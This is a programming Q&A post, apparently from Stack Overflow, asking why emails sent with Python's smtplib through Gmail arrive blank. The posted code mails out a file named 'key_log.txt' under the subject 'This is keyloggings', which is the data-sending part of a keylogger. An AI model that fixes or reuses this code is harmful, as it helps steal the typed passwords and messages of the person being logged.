# Email sent though Python is totally blank

Tags: python-2.7

When I sent an email through python to my GMail account the email is sent but its totally blank i.e without the data. Here is the code I used:

```
 email_user = 'user@gmail.com'
 email_password = '********'
 email_send = 'send@gmail.com'

 subject = 'This is keyloggings '

 msg = MIMEMultipart()
 msg['From'] = email_user
 msg['To'] = email_send
 msg['Subject'] = subject

 body = 'This is keyloggings'
 msg.attach(MIMEText(body,'plain'))

 filename = 'key_log.txt'
 attachment  = open(filename,'rb')

 part = MIMEBase('application','octet-stream')
 part.set_payload((attachment).read())
 encoders.encode_base64(part)
 part.add_header('Content-Disposition',"attachment;filename= %s" %filename)

 msg.attach(part)

 server = smtplib.SMTP('smtp.gmail.com',587)
 server.ehlo()
 server.starttls()
 server.ehlo()
 server.login(email_user,email_password)
 text = msg.as_string()
 server.sendmail(email_user,email_send,text)
 server.quit()
```

Comment: Better explained problem and modified title to proper resume the topic.

Comment: Have you tried looking at the raw source of the message?

Comment: i cant understand what ur saying